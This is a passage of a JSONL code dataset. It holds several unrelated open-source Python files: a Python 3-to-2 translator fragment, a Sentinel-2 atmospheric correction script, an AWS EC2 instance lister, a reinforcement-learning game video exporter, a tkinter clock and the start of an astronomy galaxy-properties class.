token.type != 'comment':\n self._future_status = 2 # done\n i = max(0, token.find_backward('\\n'))\n t = Token(token.total_text, '', i, i)\n t.fix = '\\nfrom __future__ import %s\\n' % (', '.join(self.FUTURES))\n return t\n \n def fix_newstyle(self, token):\n \"\"\" Fix to always use new style classes.\n \"\"\"\n if token.type == 'keyword' and token.text == 'class':\n nametoken = token.next_token\n if nametoken.next_char != '(':\n nametoken.fix = '%s(object)' % nametoken.text\n \n def fix_super(self, token):\n \"\"\" Fix super() -> super(Cls, self)\n \"\"\"\n # First keep track of the current class\n if token.type == 'keyword':\n if token.text == 'class':\n self._current_class = token.indentation, token.next_token.text\n elif token.text == 'def':\n indent, name = getattr(self, '_current_class', (0, ''))\n if token.indentation <= indent:\n self._current_class = 0, ''\n \n # Then check for super\n if token.type == 'identifier' and token.text == 'super':\n if token.prev_char != '.' and token.next_char == '(':\n i = token.find_forward(')')\n sub = token.total_text[token.end:i+1]\n if re.sub(r\"\\s+\", '', sub) == '()':\n indent, name = getattr(self, '_current_class', (0, ''))\n if name:\n token.end = i + 1\n token.fix = 'super(%s, self)' % name\n \n # Note: we use \"from __future__ import unicode_literals\"\n # def fix_unicode_literals(self, token):\n # if token.type == 'string':\n # if token.text.lstrip('r').startswith(('\"', \"'\")): # i.e. no b/u\n # token.fix = 'u' + token.text\n \n def fix_unicode(self, token):\n if token.type == 'identifier':\n if token.text == 'chr' and token.next_char == '(':\n # Calling chr\n token.fix = 'unichr'\n elif token.text == 'str' and token.next_char == '(':\n # Calling str\n token.fix = 'unicode'\n elif token.text == 'str' and (token.next_char == ')' and\n token.prev_char == '(' and\n token.line_tokens[0].text == 'class'):\n token.fix = 'unicode'\n elif token.text == 'isinstance' and token.next_char == '(':\n # Check for usage of str in isinstance\n end = token.find_forward(')')\n t = token.next_token\n while t.next_token and t.next_token.start < end:\n t = t.next_token\n if t.text == 'str':\n t.fix = 'basestring'\n \n def fix_range(self, token):\n if token.type == 'identifier' and token.text == 'range':\n if token.next_char == '(' and token.prev_char != '.':\n token.fix = 'xrange'\n \n def fix_encode(self, token):\n if token.type == 'identifier' and token.text in('encode', 'decode'):\n if token.next_char == '(' and token.prev_char == '.':\n end = token.find_forward(')')\n if not (token.next_token and token.next_token.start < end):\n token.fix = token.text + '(\"utf-8\")'\n token.end = end + 1\n \n def fix_getcwd(self, token):\n \"\"\" Fix os.getcwd -> os.getcwdu\n \"\"\"\n if token.type == 'identifier' and token.text == 'getcwd':\n if token.next_char == '(':\n token.fix = 'getcwdu'\n \n def fix_imports(self, token):\n \"\"\" import xx.yy -> import zz\n \"\"\"\n if token.type == 'keyword' and token.text == 'import': \n tokens = token.line_tokens\n \n # For each import case ...\n for name, replacement in self.IMPORT_MAPPING.items():\n parts = name.split('.')\n # Walk over tokens to find start of match\n for i in range(len(tokens)):\n if (tokens[i].text == parts[0] and\n len(tokens[i:]) >= len(parts)):\n # Is it a complete match?\n for j, part in enumerate(parts):\n if tokens[i+j].text != part:\n break\n else:\n # Match, marge tokens\n tokens[i].end = tokens[i+len(parts)-1].end\n tokens[i].fix = replacement\n for j in range(1, len(parts)):\n tokens[i+j].start = tokens[i].end\n tokens[i+j].end = tokens[i].end\n tokens[i+j].fix = ''\n break # we have found the match\n \n def fix_imports2(self, token):\n \"\"\" from xx.yy import zz -> from vv import zz\n \"\"\"\n if token.type == 'keyword' and token.text == 'import': \n tokens = token.line_tokens\n \n # We use the fact that all imports keys consist of two names\n if tokens[0].text == 'from' and len(tokens) == 5:\n if tokens[3].text == 'import':\n xxyy = tokens[1].text + '.' + tokens[2].text\n name = tokens[4].text\n if xxyy in self.IMPORT_MAPPING2:\n for possible_module in self.IMPORT_MAPPING2[xxyy]:\n if name in self.PY2MODULES[possible_module]:\n tokens[1].fix = possible_module\n tokens[1].end = tokens[2].end\n tokens[2].start = tokens[2].end\n break\n\n\n # Map simple import paths to new import import paths\n IMPORT_MAPPING = {\n \"reprlib\": \"repr\",\n \"winreg\": \"_winreg\",\n \"configparser\": \"ConfigParser\",\n \"copyreg\": \"copy_reg\",\n \"queue\": \"Queue\",\n \"socketserver\": \"SocketServer\",\n \"_markupbase\": \"markupbase\",\n \"test.support\": \"test.test_support\",\n \"dbm.bsd\": \"dbhash\",\n \"dbm.ndbm\": \"dbm\",\n \"dbm.dumb\": \"dumbdbm\",\n \"dbm.gnu\": \"gdbm\",\n \"html.parser\": \"HTMLParser\",\n \"html.entities\": \"htmlentitydefs\",\n \"http.client\": \"httplib\",\n \"http.cookies\": \"Cookie\",\n \"http.cookiejar\": \"cookielib\",\n \"urllib.robotparser\": \"robotparser\",\n \"xmlrpc.client\": \"xmlrpclib\",\n \"builtins\": \"__builtin__\",\n }\n \n \n # Map import paths to ... a set of possible import paths\n IMPORT_MAPPING2 = {\n 'urllib.request': ('urllib2', 'urllib'),\n 'urllib.error': ('urllib2', 'urllib'),\n 'urllib.parse': ('urllib2', 'urllib', 'urlparse'),\n 'dbm.__init__': ('anydbm', 'whichdb'),\n 'http.server': ('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),\n 'xmlrpc.server': ('DocXMLRPCServer', 'SimpleXMLRPCServer'),\n }\n\n # This defines what names are in specific Python 2 modules\n PY2MODULES = {\n 'urllib2' : (\n 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',\n 'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',\n 'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',\n 'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',\n 'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',\n 'HTTPHandler', 'HTTPPasswordMgr',\n 'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',\n 'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',\n 'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',\n 'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',\n 'build_opener', 'install_opener', 'parse_http_list',\n 'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),\n 'urllib' : (\n 'ContentTooShortError', 'FancyURLopener', 'URLopener',\n 'basejoin', 'ftperrors', 'getproxies',\n 'getproxies_environment', 'localhost', 'pathname2url',\n 'quote', 'quote_plus', 'splitattr', 'splithost',\n 'splitnport', 'splitpasswd', 'splitport', 'splitquery',\n 'splittag', 'splittype', 'splituser', 'splitvalue',\n 'thishost', 'unquote', 'unquote_plus', 'unwrap',\n 'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',\n 'urlretrieve',),\n 'urlparse' : (\n 'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',\n 'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),\n 'dbm' : (\n 'ndbm', 'gnu', 'dumb'),\n 'anydbm' : (\n 'error', 'open'),\n 'whichdb' : (\n 'whichdb',),\n 'BaseHTTPServer' : (\n 'BaseHTTPRequestHandler', 'HTTPServer'),\n 'CGIHTTPServer' : (\n 'CGIHTTPRequestHandler',),\n 'SimpleHTTPServer' : (\n 'SimpleHTTPRequestHandler',),\n 'DocXMLRPCServer' : (\n 'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',\n 'DocXMLRPCServer', 'ServerHTMLDoc', 'XMLRPCDocGenerator'),\n }\n\n\nif __name__ == '__main__':\n # Awesome for testing\n \n code = \"\"\"\n \"\"\"\n \n t = LegacyPythonTranslator(code)\n new_code = t.translate()\n print(t.tokens)\n print('---')\n print(new_code)\n","repo_name":"flexxui/pscript","sub_path":"translate_to_legacy.py","file_name":"translate_to_legacy.py","file_ext":"py","file_size_in_byte":20857,"program_lang":"python","lang":"en","doc_type":"code","stars":247,"dataset":"github-code","pt":"81"} +{"seq_id":"9278309826","text":"import os\nimport sys\nimport shutil\nimport argparse\nimport requests\nimport warnings\nwarnings.filterwarnings(\"ignore\") \nimport numpy as np\nfrom glob import glob\nfrom SIAC.get_MCD43 import get_mcd43\nfrom datetime import datetime\nfrom SIAC.the_aerosol import solve_aerosol\nfrom SIAC.create_logger import create_logger\nfrom SIAC.the_correction import atmospheric_correction\nfrom SIAC.s2_preprocessing import s2_pre_processing\nfrom SIAC.downloaders import downloader\nfrom SIAC.multi_process import parmap\nfrom os.path import expanduser\nhome = expanduser(\"~\")\nfile_path = os.path.dirname(os.path.realpath(__file__))\n\ndef SIAC_S2(s2_t, send_back = False, mcd43 = home + '/MCD43/', vrt_dir = home + '/MCD43_VRT/', aoi = None, \n global_dem = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/eles/global_dem.vrt', \\\n cams_dir = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/cams/', jasmin = False):\n if not os.path.exists(file_path + '/emus/'):\n os.mkdir(file_path + '/emus/')\n if len(glob(file_path + '/emus/' + 'isotropic_MSI_emulators_*_x?p_S2?.pkl')) < 12:\n url = 'http://www2.geog.ucl.ac.uk/~ucfafyi/emus/'\n req = requests.get(url)\n to_down = []\n for line in req.text.split():\n if 'MSI' in line:\n fname = line.split('\"')[1].split('<')[0]\n if 'MSI' in fname:\n to_down.append([fname, url])\n f = lambda fname_url: downloader(fname_url[0], fname_url[1], file_path + '/emus/')\n parmap(f, to_down)\n rets = s2_pre_processing(s2_t)\n aero_atmos = []\n for ret in rets:\n ret += (mcd43, vrt_dir, aoi, global_dem, cams_dir, jasmin)\n aero_atmo = do_correction(*ret)\n if send_back:\n aero_atmos.append(aero_atmo)\n if send_back:\n return aero_atmos\n\ndef do_correction(sun_ang_name, view_ang_names, toa_refs, cloud_name, \\\n cloud_mask, metafile, mcd43 = home + '/MCD43/', vrt_dir = home + '/MCD43_VRT/', aoi=None, \\\n global_dem = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/eles/global_dem.vrt', \\\n cams_dir = '/vsicurl/http://www2.geog.ucl.ac.uk/~ucfafyi/cams/', jasmin = False):\n if jasmin:\n global_dem = '/work/scratch/marcyin/DEM/global_dem.vrt'\n cams_dir = '/work/scratch/marcyin/CAMS/'\n os.environ['jasmin_memory_limit'] = '6.4e+10'\n #vrt_dir = '/work/scratch/marcyin/MCD43_VRT/'\n if os.path.realpath(mcd43) in os.path.realpath(home + '/MCD43/'):\n if not os.path.exists(home + '/MCD43/'):\n os.mkdir(home + '/MCD43/')\n\n if os.path.realpath(vrt_dir) in os.path.realpath(home + '/MCD43_VRT/'):\n if not os.path.exists(home + '/MCD43_VRT/'):\n os.mkdir(home + '/MCD43_VRT/')\n\n base = os.path.dirname(toa_refs[0])\n base = toa_refs[0].replace('B01.jp2', '')\n with open(metafile) as f:\n for i in f.readlines():\n if 'SENSING_TIME' in i:\n sensing_time = i.split('')[-1]\n obs_time = datetime.strptime(sensing_time, u'%Y-%m-%dT%H:%M:%S.%fZ')\n if 'TILE_ID' in i:\n sat = i.split('')[-1].split('_')[0]\n tile = i.split('')[-1]\n log_file = os.path.dirname(metafile) + '/SIAC_S2.log'\n logger = create_logger(log_file)\n logger.info('Starting atmospheric corretion for %s'%tile)\n if not np.all(cloud_mask):\n handlers = logger.handlers[:]\n for handler in handlers:\n handler.close()\n logger.removeHandler(handler)\n #if not jasmin:\n vrt_dir = get_mcd43(toa_refs[0], obs_time, mcd43_dir = mcd43, vrt_dir = vrt_dir, log_file = log_file, jasmin = jasmin)\n #logger = create_logger(log_file)\n else:\n logger.info('No clean pixel in this scene and no MCD43 is downloaded.')\n sensor_sat = 'MSI', sat\n band_index = [1,2,3,7,11,12]\n band_wv = [469, 555, 645, 859, 1640, 2130]\n toa_bands = (np.array(toa_refs)[band_index,]).tolist()\n view_angles = (np.array(view_ang_names)[band_index,]).tolist()\n sun_angles = sun_ang_name\n #logger.info('Running SIAC for tile: %s on %s'%(tile, obs_time.strftime('%Y-%M-%d')))\n aero = solve_aerosol(sensor_sat,toa_bands,band_wv, band_index,view_angles,\\\n sun_angles,obs_time,cloud_mask, gamma=10., spec_m_dir= \\\n file_path+'/spectral_mapping/', emus_dir=file_path+'/emus/', \\\n mcd43_dir=vrt_dir, aoi=aoi, log_file = log_file, global_dem = global_dem, cams_dir = cams_dir)\n aero._solving()\n toa_bands = toa_refs\n view_angles = view_ang_names\n aot = base + 'aot.tif'\n tcwv = base + 'tcwv.tif'\n tco3 = base + 'tco3.tif'\n aot_unc = base + 'aot_unc.tif'\n tcwv_unc = base + 'tcwv_unc.tif'\n tco3_unc = base + 'tco3_unc.tif'\n rgb = [toa_bands[3], toa_bands[2], toa_bands[1]]\n band_index = [0,1,2,3,4,5,6,7,8,9,10,11,12]\n atmo = atmospheric_correction(sensor_sat,toa_bands, band_index,view_angles,\\\n sun_angles, aot = aot, cloud_mask = cloud_mask,\\\n tcwv = tcwv, tco3 = tco3, aot_unc = aot_unc, \\\n tcwv_unc = tcwv_unc, tco3_unc = tco3_unc, rgb = \\\n rgb, emus_dir=file_path+'/emus/', log_file = log_file, global_dem = global_dem, cams_dir = cams_dir)\n atmo._doing_correction()\n if jasmin:\n shutil.rmtree(vrt_dir)\n return aero, atmo\n\ndef exe():\n parser = argparse.ArgumentParser(description='Sentinel 2 Atmospheric Correction Excutable')\n parser.add_argument('-f', \"--file_path\", help='Sentinel 2 file path', required=True)\n parser.add_argument(\"-m\", \"--MCD43_file_dir\", help=\"Directory where you store MCD43A1.006 data\", default = home + '/MCD43/')\n parser.add_argument(\"-v\", \"--vrt_dir\", help=\"Where MCD43 vrt stored.\", default = home + '/MCD43_VRT/')\n parser.add_argument(\"-a\", \"--aoi\", help=\"Area of Interest.\", default = None)\n args = parser.parse_args()\n SIAC_S2(s2_t=args.file_path, mcd43=args.MCD43_file_dir, vrt_dir=args.vrt_dir, aoi=args.aoi)\n\nif __name__ == '__main__':\n exe()\n\n","repo_name":"MarcYin/MT_SIAC","sub_path":"MT_SIAC/SIAC_S2.py","file_name":"SIAC_S2.py","file_ext":"py","file_size_in_byte":6296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74481765384","text":"# index.py\n#\n# Author: Ryan Russell\n# Purpose: List all EC2 instances from regions in an AWS account.\n# Filter for instance_state and Tag\n# Runtime: Python 3.6\n# Input: None\n# Output: Result object list of all regions with instances matching filters\n# Other Dependencies: IAM Permissions for:\n# - ec2:DescribeInstances\n# - ec2:DescribeRegions\n# \n\nimport time, os, boto3\n\n# Define instance states to filter by\nINSTANCE_STATE = ['stopped']\n\n# Define tag environment variable\nTAG_ENV_VAR = 'EC2_TAG'\n\n# For use with AWS Lambda\ndef lambda_handler(event, context):\n\n start = time.time() # Begin execution timer\n\n client = boto3.client('ec2')\n \n result = { } # Search Result Object\n response = { } # JSON object response\n response['filters'] = { } # Filter object (JSON response)\n \n # Get the region list from AWS\n regions = [region['RegionName'] for region in client.describe_regions()['Regions']]\n \n # Build the filter object\n ec2_filter = [{\n 'Name': 'instance-state-name',\n 'Values': INSTANCE_STATE\n }]\n response['filters']['instance-state-name'] = ec2_filter[0]['Values']\n \n # Look for the tag filter from the environment variables. \n try:\n tag = os.environ[TAG_ENV_VAR]\n response['filters']['ec2_tag'] = tag\n ec2_filter.append({\n 'Name': 'tag-key',\n 'Values':[tag]\n })\n print('EC2_TAG: ' + tag)\n except:\n response['filters']['ec2_tag'] = None\n print('No EC2 Tag Defined. Listing all.')\n \n print('Looking for instances in all regions...')\n \n # Start search against AWS\n for i in range(0,len(regions)):\n result[regions[i]] = [ ]\n client = boto3.client('ec2',region_name=regions[i])\n instances = client.describe_instances(Filters=ec2_filter)\n \n # If instances are present in the describe_instances response\n if len(instances['Reservations']) > 0 :\n print(regions[i] + ':')\n for j in range(0,len(instances['Reservations'])):\n for k in range(0,len(instances['Reservations'][j]['Instances'])):\n result[regions[i]].append(instances['Reservations'][j]['Instances'][k]['InstanceId'])\n print(' ' + instances['Reservations'][j]['Instances'][k]['InstanceId'])\n \n # If no instances found\n else:\n print(regions[i] + ': No Instances Found')\n \n print('Instance Search Complete')\n \n print('Filters: ' + str(response['filters']))\n \n #Build JSON response object\n response['instances'] = result\n response['version'] = \"0.2.0\"\n response['timestampGMT'] = time.strftime(\"%a, %d %b %Y %H:%M:%S +0000\", time.gmtime())\n print('Timestamp: ' + response['timestampGMT'])\n \n end = time.time() # End execution timer\n response['executionTimeSec'] = end - start\n print('Execution Time: ' + str(response['executionTimeSec']) + 's')\n \n return response # Return JSON response object\n \n# For use with command line\n# $ python3 \nif __name__ == '__main__':\n lambda_handler(None,None)","repo_name":"arsci/aws-ec2-find-instances","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24366842546","text":"# Video exporter for use with rescue game\n\nimport os\nimport cv2\nimport utils\nimport torch\nimport numpy as np\nimport shutil\n\nfrom typing import Union\n\nfrom rescue import RescueTheGeneralEnv\nfrom train import make_env\nfrom algorithms import PMAlgorithm\nfrom utils import draw_pixel\n\ndef display_role_prediction(frame: np.ndarray, dx: int, dy: int, raw_predictions, env:RescueTheGeneralEnv):\n \"\"\"\n :param dx: draw location\n :param dy: draw location\n :param raw_predictions: nd array of dims [n_players, n_players, n_roles]\n :return:\n \"\"\"\n\n n_players = len(raw_predictions)\n\n # format the role predictions\n role_predictions = np.exp(raw_predictions)\n\n block_size = 8\n for i in range(n_players):\n draw_pixel(frame, dy, dx + (i + 1) * block_size, c=env.players[i].team_color,\n size=block_size) # indicate roles\n draw_pixel(frame, dy + (i + 1) * block_size, dx, c=env.players[i].id_color,\n size=block_size) # indicate roles\n\n for i in range(n_players):\n for j in range(n_players):\n c = [int(x * 255) for x in role_predictions[i, j]]\n draw_pixel(frame, dy + (i + 1) * block_size, dx + (j + 1) * block_size, c=c, size=block_size)\n\ndef display_policy(frame: np.ndarray, dx:int, dy:int, policy: np.ndarray,\n action: Union[int, None] = None,\n prev_action: Union[int, None] = None,\n\n ):\n \"\"\"\n :param frame:\n :param dx:\n :param dy:\n :param policy: nd array of dims [n_roles, n_actions] as probability distribution (0..1)\n :param action: (optional) the action the player took\n :return:\n \"\"\"\n n_roles, n_actions = policy.shape\n\n base_colors = np.asarray([\n (0.3, 0.3, 0.3), # no-op\n (0.1, 0.1, 0.1), # move\n (0.1, 0.1, 0.1), # move\n (0.1, 0.1, 0.1), # move\n (0.1, 0.1, 0.1), # move\n (0.3, 0.3, 0.3), # act\n (0.1, 0.1, 0.1), # shoot\n (0.1, 0.1, 0.1), # shoot\n (0.1, 0.1, 0.1), # shoot\n (0.1, 0.1, 0.1), # shoot\n\n ])\n\n for r in range(n_roles):\n on_color = np.asarray((0.0, 0.0, 0.0))\n on_color[r] = 1.0\n for a in range(n_actions):\n weight = policy[r, a]\n c = weight * on_color\n frame[dy + r, dx + a] = (c*255).astype(np.uint8)\n\n for a in range(n_actions):\n # show markers at bottom indicating what is what\n if a < len(base_colors):\n c = base_colors[a]\n else:\n c = 0.0\n if action is not None and a == action:\n c = 0.8 # indicate which action the player took.\n elif prev_action is not None and a == prev_action:\n c = 0.5 # show the previous action too, if required (useful for deception bonus)\n\n c = np.asarray(c)\n\n frame[dy + n_roles, dx + a] = (c * 255).astype(np.uint8)\n\ndef export_video(filename, algorithm: PMAlgorithm, scenario):\n \"\"\"\n Exports a movie of model playing in given scenario\n \"\"\"\n\n scale = 8\n n_roles = 3\n\n # make a new environment so we don't mess the settings up on the one used for training.\n # it also makes sure that results from the video are not included in the log\n vec_env = make_env(scenario, parallel_envs=1, name=\"video\")\n\n env_obs = vec_env.reset()\n env = vec_env.games[0]\n frame = env.render(\"rgb_array\")\n\n obs_size = env.observation_space.shape[1] # stub, make this a shape and get from env\n n_players = len(env.players)\n n_actions = vec_env.action_space.n\n\n # work out our height\n height, width, channels = frame.shape\n orig_height, orig_width = height, width\n\n if algorithm.uses_deception_model:\n\n if algorithm.predicts_observations:\n prediction_display_width = obs_size\n prediction_display_height = obs_size\n else:\n prediction_display_width = (n_actions + 1) + 8\n prediction_display_height = (n_roles + 1) + 8\n\n # make room for predictions\n role_prediction_space = (n_players + 2) * 8 * 2\n width = max(width + role_prediction_space , (n_players * 2 + 1) * prediction_display_width)\n\n # make room for other predictions\n if algorithm.predicts_observations:\n height = height + n_players * prediction_display_height\n if algorithm.predicts_actions:\n height = height + n_players * prediction_display_height\n\n scaled_width = (width * scale) // 4 * 4 # make sure these are multiples of 4\n scaled_height = (height * scale) // 4 * 4\n\n # create video recorder\n video_out = cv2.VideoWriter(filename, cv2.VideoWriter_fourcc(*'mp4v'), 8, (scaled_width, scaled_height),\n isColor=True)\n\n # this is required to make sure the last frame is visible\n vec_env.auto_reset = False\n\n rnn_state = algorithm.get_initial_rnn_state(len(env.players))\n\n last_outcome = \"\"\n bonus = None\n\n def channels_first_to_last(x):\n \"\"\"\n Swap from chw to whc\n :param x:\n :return:\n \"\"\"\n return x.swapaxes(0, 2)\n\n actions = np.zeros([len(vec_env.players)], dtype=np.long)\n\n # play the game...\n while last_outcome == \"\":\n\n last_outcome = env.round_outcome\n prev_actions = actions.copy()\n\n with torch.no_grad():\n roles = vec_env.get_roles()\n obs_truth = env_obs.copy()\n model_output, new_rnn_state = algorithm.forward(\n torch.from_numpy(env_obs),\n rnn_state,\n torch.from_numpy(roles)\n )\n\n rnn_state[:] = new_rnn_state\n\n log_policy = model_output[\"log_policy\"].detach().cpu().numpy()\n actions = utils.sample_action_from_logp(log_policy)\n\n # generate frames from global perspective\n frame = env.render(\"rgb_array\")\n\n blank_frame = np.zeros([height, width, 3], dtype=np.uint8)\n blank_frame[:frame.shape[0], :frame.shape[1], :] = frame # copy into potentially larger frame\n frame = blank_frame\n\n # add additional parts based on the output of the model\n if \"role_prediction\" in model_output:\n role_predictions = model_output[\"role_prediction\"].detach().cpu().numpy()\n display_role_prediction(frame, orig_width, 10, role_predictions, env)\n\n if \"policy_role_prediction\" in model_output:\n role_predictions = model_output[\"policy_role_prediction\"].detach().cpu().numpy()\n display_role_prediction(frame, orig_width, 60, role_predictions, env)\n\n if \"role_backwards_prediction\" in model_output:\n backwards_role_predictions = model_output[\"role_backwards_prediction\"].detach().cpu().numpy()\n backwards_role_predictions_transposed = backwards_role_predictions.swapaxes(0, 1)\n display_role_prediction(frame, orig_width + (n_players + 2) * 8, 10, backwards_role_predictions_transposed, env)\n\n if \"obs_prediction\" in model_output:\n # ground truth\n for i in range(n_players):\n dx = 0\n dy = orig_height + i * obs_size\n frame[dy:dy + obs_size, dx:dx + obs_size] = channels_first_to_last(obs_truth[i])\n\n # predictions\n # observation frames are [n_players, n_predictions, c, h, w]\n obs_predictions = model_output[\"obs_prediction\"].detach().cpu().numpy()\n n_players, n_predictions, c, h, w = obs_predictions.shape\n for i in range(n_players):\n for j in range(n_predictions):\n dx = j * obs_size + obs_size\n dy = orig_height + i * obs_size\n predictions_transposed = channels_first_to_last(np.asarray(obs_predictions[i, j] * 255, dtype=np.uint8))\n frame[dy:dy + obs_size, dx:dx + obs_size] = predictions_transposed\n\n if \"obs_backwards_prediction\" in model_output:\n obs_pp = model_output[\"obs_backwards_prediction\"].detach().cpu().numpy()\n for i in range(n_players):\n for j in range(n_players):\n dx = j * obs_size + (obs_size * (n_players + 1))\n dy = orig_height + i * obs_size\n # we transpose as rescue is x,y instead of y,x\n predictions_transposed = channels_first_to_last(np.asarray(obs_pp[j, i] * 255, dtype=np.uint8))\n frame[dy:dy + obs_size, dx:dx + obs_size] = predictions_transposed\n\n if \"action_prediction\" in model_output:\n action_predictions = np.exp(model_output[\"action_prediction\"].detach().cpu().numpy())\n action_prediction_predictions = np.exp(model_output[\"action_backwards_prediction\"].detach().cpu().numpy())\n true_policy = np.exp(model_output[\"role_log_policy\"].detach().cpu().numpy())\n _, _, _, n_actions = action_predictions.shape\n\n # these come out as n_players, n_players, n_roles, n_actions ?\n policy_spacing_y = (n_roles+2)\n\n # true policy\n for i in range(n_players):\n dx = 0 * (n_actions+1) + 4\n dy = orig_height + i * policy_spacing_y\n display_policy(frame, dx, dy, true_policy[i], actions[i], prev_actions[i])\n\n # predicted policy\n for i in range(n_players):\n for j in range(n_players):\n dx = (j+1) * (n_actions+1) + 8\n dy = orig_height + i * policy_spacing_y\n display_policy(frame, dx, dy, action_predictions[i, j])\n\n # predictions of other players predictions of our own policy\n for i in range(n_players):\n for j in range(n_players):\n dx = (n_players+(j+1)) * (n_actions+1) + 12\n dy = orig_height + i * policy_spacing_y\n display_policy(frame, dx, dy, action_prediction_predictions[i, j])\n\n # add deception bonus indicators (on top of role prediction)\n if bonus is not None:\n\n for i in range(n_players):\n dx = orig_width\n dy = 10 + (i + 1) * 8\n for scale in [0, 1, 2]:\n\n factor = bonus[i] / (10 ** (2 - scale))\n\n if factor > 0:\n c = np.asarray((factor, 0.0, 0.0), np.float)\n else:\n c = np.asarray((0.0, 0.0, -factor), np.float)\n\n c = np.clip(c * 255, 0, 255).astype(np.uint8)\n\n frame[dy+scale+1:dy+8-scale-1, dx+scale+1:dx+8-scale-1] = c\n\n # write time stamp\n utils.draw_numbers(frame, width-4*5, height-6, str(env.round_timer), [255, 255, 255], zero_pad=4)\n\n # for some reason cv2 wants BGR instead of RGB\n frame[:, :, :] = frame[:, :, ::-1]\n\n if frame.shape[0] != scaled_width or frame.shape[1] != scaled_height:\n frame = cv2.resize(frame, (scaled_width, scaled_height), interpolation=cv2.INTER_NEAREST)\n\n assert \\\n frame.shape[1] == scaled_width and frame.shape[0] == scaled_height, \\\n \"Frame should be {} but is {}\".format((scaled_width, scaled_height, 3), frame.shape)\n\n video_out.write(frame)\n\n # step environment\n if last_outcome == \"\":\n env_obs, env_rewards, env_dones, env_infos = vec_env.step(actions)\n\n # calculate deception bonus\n if algorithm.uses_deception_model and not algorithm.predicts_observations:\n # show bonus, only works on actions at the moment\n # this bonus is for the action we *will* take on the next frame.\n players_visible = []\n for player in env.players:\n vision = [player.in_vision(other_player.x, other_player.y) for other_player in env.players]\n players_visible.append(vision)\n players_visible = np.asarray(players_visible)\n bonus = algorithm.calculate_deception_bonus(model_output, actions, vec_env, roles, players_visible)\n else:\n bonus = None\n\n # write last frame out 10 times\n # this is because some video players terminate at the end of the video making it *very* hard to see the last frame\n # (which is often very important)\n for _ in range(10):\n video_out.write(frame)\n\n video_out.release()\n\n # rename video to include outcome\n try:\n outcome = env.game_outcomes\n # if we only ran one round then remove the unnecessary array brackets\n if type(outcome) == list and len(outcome) == 1:\n outcome = outcome[0]\n modified_filename = f\"{os.path.splitext(filename)[0]} [{outcome}]{os.path.splitext(filename)[1]}\"\n shutil.move(filename, modified_filename)\n except:\n print(\"Warning: could not rename video file.\")\n\n\n\n","repo_name":"maitchison/RTG","sub_path":"video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"70255539464","text":"from tkinter import *\r\nfrom tkinter.ttk import *\r\nfrom time import strftime\r\n\r\ndef tkinter_clock():\r\n root = Tk()\r\n root.title(\"Clock\")\r\n root.geometry(\"300x62\")\r\n root.minsize(296, 60)\r\n root.maxsize(302, 63)\r\n root.iconbitmap(\"Computer_icon.ico\")\r\n\r\n def time():\r\n string = strftime(\"%H:%M:%S %p\")\r\n label.config(text=string)\r\n label.after(1000, time)\r\n\r\n label = Label(root, font=(\"lucida\", 40), background=\"black\", foreground=\"cyan\")\r\n label.pack(anchor=\"center\")\r\n time()\r\n mainloop()\r\n\r\n# tkinter_clock()\r\n","repo_name":"UjjwalSaini07/Voice_assistant","sub_path":"Clock_GUI.py","file_name":"Clock_GUI.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"16565726963","text":"#!/usr/bin/python\n# -*- coding: latin-1 -*-\n\nimport pandas as pd\nDustPath = '/home/dustpedia/DustFolder/'\nbandwavpath = DustPath+'scripts/bands_and_wvlghts.txt'\ndict_df = pd.read_csv(bandwavpath, delimiter = '\\t')\nWvlghts_dictionary = dict(zip(dict_df['name'], dict_df['lambda_eff']))\n\nclass GalaxyProperties:\n def __init__(self, galaxy_name, table_path = DustPath+'/DustPedia_Tables/DustPedia_HyperLEDA_Herschel.csv', cosmology = 'Planck15'):\n import pandas as pd\n from astropy import units as u\n from astropy.constants import c as v_lux\n if cosmology == 'Planck15':\n from astropy.cosmology import Planck15 as cosmo\n elif cosmology == 'FlatLambdaCDM':\n from astropy.cosmology import FlatLambdaCDM\n cosmo = FlatLambdaCDM(H0=70 * u.km / u.s / u.Mpc, Tcmb0=2.725 * u.K, Om0=0.3) \n \n self.galaxy_name = galaxy_name \n df = pd.read_csv(table_path)\n self.properties_table = df.loc[df['objname'] == self.galaxy_name]\n self.ra = self.properties_table['ra2000'].values[0]*u.deg\n self.dec = self.properties_table['de2000'].values[0]*u.deg\n self.t = self.properties_table['t'].values[0]\n self.d25 = self.properties_table['d25'].values[0]*u.arcmin\n self.incl = self.properties_table['incl'].values[0]\n self.dist = self.properties_table['dist_best'].values[0]*u.Mpc\n self.z_source = cosmo.H0*self.dist/v_lux.to('km/s')\n self.d25_physical = cosmo.kpc_comoving_per_arcmin(self.z_source)*self.d25\n\nclass FitsUtils:\n def __init__(self, signal_path):\n import numpy as np\n from astropy.io import fits, ascii\n from astropy.wcs import WCS\n self.fits_path = signal_path\n self.signal = np.nan_to_num(fits.getdata(self.fits_path))\n self.signal_with_nans = fits.getdata(self.fits_path)\n self.hdr = fits.getheader(self.fits_path)\n self.wcs = WCS(self.hdr)\n \n if signal_path.rsplit('/',1)[-1][0:3] == 'NGC': self.bandname = 